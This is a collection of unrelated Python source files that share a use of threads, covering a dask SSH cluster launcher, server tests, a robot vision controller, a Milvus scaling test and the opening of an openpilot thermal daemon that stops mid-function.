python=remote_python or sys.executable, port=port, logdir=logdir)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}:{port}.log'.format(addr=addr,
port=port, logdir=logdir)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (bcolors.BOLD +
'scheduler {addr}:{port}'.format(addr=addr, port=port) +
bcolors.ENDC)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': addr, 'port': port,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
def start_worker(logdir, scheduler_addr, scheduler_port, worker_addr, nthreads, nprocs,
ssh_username, ssh_port, ssh_private_key, nohost, remote_python=None):
cmd = ('{python} -m distributed.cli.dask_worker '
'{scheduler_addr}:{scheduler_port} '
'--nthreads {nthreads} --nprocs {nprocs}')
if not nohost:
cmd += ' --host {worker_addr}'
cmd = cmd.format(
python=remote_python or sys.executable,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}.log'.format(
addr=worker_addr, logdir=logdir)
label = 'worker {addr}'.format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': worker_addr,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
class SSHCluster(object):
def __init__(self, scheduler_addr, scheduler_port, worker_addrs, nthreads=0, nprocs=1,
ssh_username=None, ssh_port=22, ssh_private_key=None,
nohost=False, logdir=None, remote_python=None):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(logdir, "dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
print(bcolors.WARNING + 'Output will be redirected to logfiles '
'stored locally on individual worker nodes under "{logdir}".'.format(logdir=logdir)
+ bcolors.ENDC)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(logdir, scheduler_addr,
scheduler_port, ssh_username, ssh_port,
ssh_private_key, remote_python)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return '%s:%d' % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process['output_queue'].empty():
print(process['output_queue'].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(start_worker(self.logdir, self.scheduler_addr,
self.scheduler_port, address,
self.nthreads, self.nprocs,
self.ssh_username, self.ssh_port,
self.ssh_private_key, self.nohost,
self.remote_python))
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process['input_queue'].put('shutdown')
process['thread'].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
test_server.py
|
# -*- mode: python; coding: utf-8 -*-
# Copyright 2020 the .NET Foundation
# Licensed under the MIT License.
from __future__ import absolute_import, division, print_function
from argparse import Namespace
from http.server import HTTPServer
import pytest
import requests
from threading import Thread
from time import sleep
from . import test_path
from .. import folder, server
TIMEOUT = 120
class TestRunServer(object):
@classmethod
def setup_class(cls):
cls.server_port = 33007 # just hope it's not taken
settings = Namespace()
settings.port = cls.server_port
settings.root_dir = test_path()
# Note: there can be a race condition between server startup and the
# execution of the tests. There doesn't seem to be any mechanism to
# enable the tests to rigorously wait for the server to be fully started
# up.
cls.thread = Thread(target=lambda: server.run_server(settings))
cls.thread.setDaemon(True)
cls.thread.start()
# In an attempt to help mitigate the above issue, set up requests to
# retry requests if they fail. This is hardly expected to help since if
# the server isn't yet running, the failures and retries will occur
# instantly, but it's not bad to have an example of the pattern anyway.
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
retry_strategy = Retry(
total=10,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
cls.session = requests.Session()
cls.session.mount("https://", adapter)
cls.session.mount("http://", adapter)
def test_wtml_rewrite(self):
base_url = "http://localhost:{}/".format(self.server_port)
# More race condition mitigation
for attempt in range(10):
try:
f = folder.Folder.from_url(
base_url + "test1.wtml", timeout=TIMEOUT, session=self.session
)
break
except requests.ConnectionError:
sleep(5)
assert f.children[0].thumbnail == base_url + "thumb.jpg"
class TestPreviewWtml(object):
"""
This is basically a smoketest to get code coverage of the preview function.
"""
@classmethod
def setup_class(cls):
cls.opened_url = None
import webbrowser
class DummyBrowser(object):
def open(self, url, **kwargs):
cls.opened_url = url
webbrowser.register("wwtdummy", DummyBrowser)
# Note: there can be a race condition between server startup and the
# execution of the tests. There doesn't seem to be any mechanism to
# enable the tests to rigorously wait for the server to be fully started
# up.
cls.thread = Thread(
target=lambda: server.preview_wtml(
test_path("test1_rel.wtml"), browser="wwtdummy"
)
)
cls.thread.setDaemon(True)
cls.thread.start()
# In an attempt to help mitigate the above issue, set up requests to
# retry requests if they fail. This is hardly expected to help since if
# the server isn't yet running, the failures and retries will occur
# instantly, but it's not bad to have an example of the pattern anyway.
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
retry_strategy = Retry(
total=10,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
cls.session = requests.Session()
cls.session.mount("https://", adapter)
cls.session.mount("http://", adapter)
def test_preview(self):
for attempt in range(10):
if self.opened_url is not None:
break
sleep(5)
assert "_rel" not in self.opened_url
def test_smoke():
"""Dumb smoketest."""
server_address = ("", 0)
with HTTPServer(server_address, server.WWTRequestHandler) as httpd:
pass
|
__init__.py
|
"""
pyJsConsole wrapper.
© Anime no Sekai - 2020
"""
from .internal.javascript import classes as JSClass
console = JSClass._Console()
document = JSClass._Document()
history = JSClass._History()
Math = JSClass._Math()
navigator = JSClass._Navigator()
screen = JSClass._Screen()
window = JSClass._Window()
browser = JSClass.BrowserObject
'''
import threading
from lifeeasy import sleep
def reloadElements():
global document
global window
lastURL = 'data:,'
while True:
sleep(0.1)
try:
if JSClass.evaluate('window.location.href') != lastURL:
document = JSClass._Document()
window = JSClass._Window()
lastURL = JSClass.evaluate('window.location.href')
except:
break
thread = threading.Thread(target=reloadElements)
thread.daemon = True
thread.start()
'''
def newDocument():
return JSClass._Document()
def newWindow():
return JSClass._Window()
def newHistory():
return JSClass._History()
def fresh():
return (JSClass._Document(), JSClass._Window(), JSClass._History())
def clearInterval(intervalID):
JSClass.clearInterval(intervalID)
def clearTimeout(timeoutID):
JSClass.clearTimeout(timeoutID)
def evaluate(code_to_execute, return_value=False):
return JSClass.evaluate(code_to_execute, return_value=return_value)
def setInterval(function, milliseconds):
return JSClass.setInterval(function, milliseconds)
def setTimeout(function, milliseconds):
return JSClass.setTimeout(function, milliseconds)
|
bm_2to3.py
|
from mpkmemalloc import *
import threading
import glob
import os.path
import sys
import pyperf
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner()
runner.metadata['description'] = "Performance of the Python 2to3 program"
args = runner.parse_args()
datadir = os.path.join(os.path.dirname(__file__), 'data', '2to3')
pyfiles = glob.glob(os.path.join(datadir, '*.py.txt'))
command = [sys.executable, "-m", "lib2to3", "-f", "all"] + pyfiles
runner.bench_command('2to3', command)
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
return(result)
# if __name__ == '__main__':
# gc.disable()
# out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
# 'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
# 'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
# process = psutil.Process(os.getpid())
# print((process.memory_info().rss)/1024) # in bytes
|
Multiprocessing_While.py
|
# _*_coding : UTF_8 _*_
# Author : Xueshan Zhang
# Date : 2022/1/11 12:08 AM
# File : Multiprocessing_While.py
# Tool : PyCharm
import datetime, time
from multiprocessing import Process
import logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s: %(levelname)s %(message)s',
datefmt='%Y-%m-%d %A %H:%M:%S',
filename='logging.log',
filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(filename)s : %(levelname)s %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
log = logging.getLogger(__name__)
def worker(name, sleep=2):
logging.info(f"Worker '{name}': {sleep} s.")
time.sleep(sleep)
logging.info(f"Worker '{name}': done.")
def boss(name, sleep=4):
logging.info(f"Boss '{name}': {sleep} s.")
time.sleep(sleep)
logging.info(f"Boss '{name}': done.")
def proStatus(con, pro):
info = [pro.is_alive(), pro.exitcode]
dict = {
'initial': [False, None],
'start': [True, None],
'stop': [False, 0],
}
if con in dict.keys():
if not info == dict[con]:
logging.info(f"{pro.name}: {info}")
else:
logging.info(f"{pro.name}: is_alive() {pro.is_alive()}, exit code {pro.exitcode}")
else:
logging.info(f"{con} not in list {dict.keys()}")
if __name__ == '__main__':
runTime = 120 # total loop time
looptime = 20 # single loop time
loopCounts = 20 # total loop counts
loop = 0
start = time.time()
while (loop < loopCounts) and (time.time()-start < runTime): # if loop is larger than loop counts or duration
logging.info(f"****** loop {loop} ******") # is larger than 'runTime', break and exit the loop
START = time.time()
i = 0
while time.time()-START < looptime:
logging.info(f"****** Sub loop {i} ******")
Subpro = Process(target=worker, kwargs={'name': 'Hanna', 'sleep': 4}, name='WORKER')
proStatus(con='initial', pro=Subpro)
Subpro.start()
proStatus(con='start', pro=Subpro)
boss(name='BOSS', sleep=2)
Subpro.join()
proStatus(con='stop', pro=Subpro)
i += 1
else:
logging.info("Post Loop")
loop += 1
else:
logging.info("> End.")
|
routes.py
|
# ******************************************************************************
# Copyright (c) 2020 University of Stuttgart
#
# See the NOTICE file(s) distributed with this work for additional
# information regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
import threading
from app import app, unfolding_utils
from flask import jsonify, abort, request
@app.route('/provenance-service', methods=['POST'])
def mitigate_error():
"""Mitigate the readout-error from the given result distribution."""
app.logger.info('Received Post request to mitigate error...')
if not request.json:
app.logger.error("Service currently only supports JSON")
abort(400, "Only Json supported")
if 'CorrelationId' not in request.json:
app.logger.error("CorrelationId not defined in request")
abort(400, "CorrelationId not defined in request")
correlation_Id = request.json['CorrelationId']
app.logger.info("CorrelationId: " + correlation_Id)
if 'ReturnAddress' not in request.json:
app.logger.error("ReturnAddress not defined in request")
abort(400, "ReturnAddress not defined in request")
return_address = request.json['ReturnAddress']
app.logger.info("ReturnAddress: " + return_address)
if 'QPU' not in request.json:
app.logger.error("QPU not defined in request")
abort(400, "QPU not defined in request")
qpu = request.json['QPU']
if 'UnfoldingTechnique' not in request.json:
app.logger.error("UnfoldingTechnique not defined in request")
abort(400, "UnfoldingTechnique defined in request")
unfolding_technique = request.json['UnfoldingTechnique']
if not unfolding_technique == 'Correction Matrix':
app.logger.error("UnfoldingTechnique is not supported. Currently only Correction Matrix can be used")
abort(400, "UnfoldingTechnique is not supported. Currently only Correction Matrix can be used")
max_age = request.json['MaxAge']
access_token = request.json['AccessToken']
if 'Result' not in request.json:
app.logger.error("Result not defined in request")
abort(400, "Result not defined in request")
result = request.json['Result']
app.logger.info("Result to mitigate: " + result)
app.logger.info("Passed input is valid")
t = threading.Thread(target=unfolding_utils.mitigate_error, args=(correlation_Id, return_address, qpu, max_age, result, access_token))
t.daemon = True
t.start()
return jsonify({'Status': "Circuit execution process initiated"}), 200
|
bulldog_vision_test.py
|
#!/usr/bin/env python
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
import actionlib
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import Float64
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
from sensor_msgs.msg import Joy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from tf.transformations import *
from math import pi
from geometry_msgs.msg import PoseStamped
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped,PoseStamped,Twist
from std_msgs.msg import Header
from sensor_msgs.msg import JointState
from threading import Thread
import threading
global RV2_motor1_joint
yolo = YOLO()
class image_converter:
def __init__(self):
# 创建cv_bridge,声明图像的发布者和订阅者
global delta_x
# location_pub = rospy.Publisher("cv_bridge_location", Float64, queue_size=1)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/mid_camera/color/image_raw/compressed", CompressedImage, self.callback)
def callback(self,data):
# 使用cv_bridge将ROS的图像数据转换成OpenCV的图像格式
global delta_x, label_list
try:
cv_image = self.bridge.compressed_imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
print('e')
#BGR转RGB格式
cv_image = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
#cv格式转image
cv_image = pilimage.fromarray(np.uint8(cv_image))
#进行yolo语音识别,提取框位置信息与识别物体信息
cv_image, bbox_list, label_list = yolo.detect_image(cv_image)
#image转cv格式
cv_image = np.array(cv_image)
#RGB在转BGR格式
cv_image = cv2.cvtColor(cv_image,cv2.COLOR_RGB2BGR)
#显示识别后cv图像
cv2.imshow("Image window", cv_image)
cv2.waitKey(3)
if type(label_list) != int: # 没检测到物体的时候,bbox_list和label_list为1
num_of_obj = len(label_list)
#print('num_of_object:', num_of_obj)
#确定跟踪物体与图像中点的相对坐标
for i in range(num_of_obj):
if 'banana' in label_list[i]:
object_center = (bbox_list[i][1]+bbox_list[i][3])*0.5
delta_x = 320-object_center
# print(delta_x)
return delta_x
# location_pub.publish(delta_x)
#motor1_move()
elif 'banana' in label_list[i]:
print("yyy")
pass
else:
print('yolo未识别到任何物体')
pass
def judge_bed():
global delta_x
image_converter()
def motor1_move():
time.sleep(1)
global command_vel_pub_m, delta_x, RV2_motor1_joint
# rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
while not rospy.is_shutdown():
print(delta_x)
#中间位判断
if -1.5 < RV2_motor1_joint < 1.5:
#左转判断条件
if delta_x > 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_x < -200:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_x < 80:
time.sleep(2)
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
#左限位判断条件
if 1.5 < RV2_motor1_joint:
#左转判断条件
if delta_x > 80:
print("a")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_x < -200:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_x < 80:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
#右限位判断条件
if RV2_motor1_joint < -1.5:
#左转判断条件
if delta_x > 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_x < -80:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_x < 80:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
else:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
time.sleep(1)
#for object in vision_database_dict:
# 再将opencv格式额数据转换成ros image格式的数据发布
# try:
# #self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
# location_pub.publish(location_pub)
# except CvBridgeError as e:
# print('e')
def RV2_motorjointstate_callback(data):
# 定义RV2 motor数据全局变量,进行赋值
global RV2_motor1_joint
RV2_motor1_joint = data.position[0]
print(RV2_motor1_joint)
def active_cb(extra):
rospy.loginfo("Goal pose being processed")
def feedback_cb(feedback):
rospy.loginfo("Current location: "+str(feedback))
def done_cb(status, result):
if status == 3:
rospy.loginfo("Goal reached")
if status == 2 or status == 8:
rospy.loginfo("Goal cancelled")
if status == 4:
rospy.loginfo("Goal aborted")
def base_move():
#rospy.init_node('listener', anonymous=True)
rospy.Subscriber('/amcl_pose',PoseWithCovarianceStamped,current_pose)
time.sleep(2)
cmd()
rospy.spin()
def current_pose(msg):
global posex,posey
posex = msg.pose.pose.position.x
posey = msg.pose.pose.position.y
print (posex,posey)
def cmd():
global label_list
#flag_k = 0
while not rospy.is_shutdown():
if type(label_list) != int: # 没检测到物体的时候,bbox_list和label_list为1
num_of_obj = len(label_list)
#print('num_of_object:', num_of_obj)
#确定跟踪物体与图像中点的相对坐标
for i in range(num_of_obj):
#if 'banana' in label_list[i] and flag_k == 0:
if 'banana' in label_list[i]:
print ('a')
navclient = actionlib.SimpleActionClient('move_base',MoveBaseAction)
navclient.wait_for_server()
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = posex+0.3
goal.target_pose.pose.position.y = posey+0.3
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
#flag_k = flag_k + 1
navclient.send_goal(goal,done_cb,active_cb, feedback_cb)
finished = navclient.wait_for_result()
if not finished:
rospy.logerr("Action server not available!")
else:
rospy.loginfo ( navclient.get_result())
time.sleep(10)
#if 'banana' not in label_list[i] and flag_k >= 1:
Goal()
time.sleep(1)
def Goal():
navclient = actionlib.SimpleActionClient('move_base',MoveBaseAction)
navclient.wait_for_server()
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = -0.2
goal.target_pose.pose.position.y = 0
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
navclient.send_goal(goal,done_cb,active_cb, feedback_cb)
finished = navclient.wait_for_result()
if not finished:
rospy.logerr("Action server not available!")
else:
rospy.loginfo ( navclient.get_result())
exit()
if __name__ == '__main__':
try:
# 初始化ros节点
rospy.init_node("vision")
rospy.loginfo("Starting cv_bridge_test node")
global command_vel_pub_m, delta_x
#创建发布者
command_vel_pub_m = rospy.Publisher('/motor_control/input/velocity', JointState, queue_size = 100, latch=True)
#订阅躯干点击位置信息
rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
#定义yolo识别子程序
t_judge_bed = threading.Thread(target = judge_bed)
t_judge_bed.start()
time.sleep(2)
# 定义躯干运动子进程
t_motor1 = threading.Thread(target = motor1_move)
t_motor1.start()
time.sleep(2)
t_base = threading.Thread(target = base_move)
t_base.start()
rospy.spin()
except KeyboardInterrupt:
print("Shutting down cv_bridge_test node.")
cv2.destroyAllWindows()
|
test_query_node_scale.py
|
import threading
import time
import pytest
from base.collection_wrapper import ApiCollectionWrapper
from common.common_type import CaseLabel
from customize.milvus_operator import MilvusOperator
from common import common_func as cf
from common import common_type as ct
from scale import constants
from pymilvus import Index, connections
from utils.util_log import test_log as log
from utils.util_k8s import wait_pods_ready
prefix = "search_scale"
nb = 5000
nq = 5
default_schema = cf.gen_default_collection_schema()
default_search_exp = "int64 >= 0"
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
class TestQueryNodeScale:
@pytest.mark.tags(CaseLabel.L3)
def test_scale_query_node(self):
release_name = "scale-query"
query_config = {
'metadata.namespace': constants.NAMESPACE,
'metadata.name': release_name,
'spec.components.image': 'harbor.zilliz.cc/milvus/milvus:master-20211202-ed546d0',
'spec.components.proxy.serviceType': 'LoadBalancer',
'spec.components.queryNode.replicas': 1,
'spec.config.dataCoord.enableCompaction': True,
'spec.config.dataCoord.enableGarbageCollection': True
}
mic = MilvusOperator()
mic.install(query_config)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy: {healthy}")
host = mic.endpoint(release_name, constants.NAMESPACE).split(':')[0]
# host = "10.98.0.8"
# connect
connections.add_connection(default={"host": host, "port": 19530})
connections.connect(alias='default')
# create
c_name = cf.gen_unique_str("scale_query")
# c_name = 'scale_query_DymS7kI4'
collection_w = ApiCollectionWrapper()
collection_w.init_collection(name=c_name, schema=cf.gen_default_collection_schema(), shards_num=2)
# insert two segments
for i in range(3):
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
log.debug(collection_w.num_entities)
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
assert collection_w.index()[0] == Index(collection_w.collection, ct.default_float_vec_field_name,
default_index_params)
# load
collection_w.load()
# scale queryNode to 5
mic.upgrade(release_name, {'spec.components.queryNode.replicas': 5}, constants.NAMESPACE)
# continuously search
def do_search():
while True:
search_res, _ = collection_w.search(cf.gen_vectors(1, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
log.debug(search_res[0].ids)
assert len(search_res[0].ids) == ct.default_limit
t_search = threading.Thread(target=do_search, args=(), daemon=True)
t_search.start()
# wait new QN running, continuously insert
# time.sleep(10)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy after scale up: {healthy}")
# wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
def do_insert():
while True:
tmp_df = cf.gen_default_dataframe_data(1000)
collection_w.insert(tmp_df)
t_insert = threading.Thread(target=do_insert, args=(), daemon=True)
t_insert.start()
log.debug(collection_w.num_entities)
time.sleep(20)
log.debug("Expand querynode test finished")
mic.upgrade(release_name, {'spec.components.queryNode.replicas': 3}, constants.NAMESPACE)
time.sleep(60)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
log.debug(collection_w.num_entities)
time.sleep(60)
log.debug("Shrink querynode test finished")
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
from smbus2 import SMBus
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.controls.lib.pid import PIController
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
def read_tz(x):
if x is None:
return 0
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def setup_eon_fan():
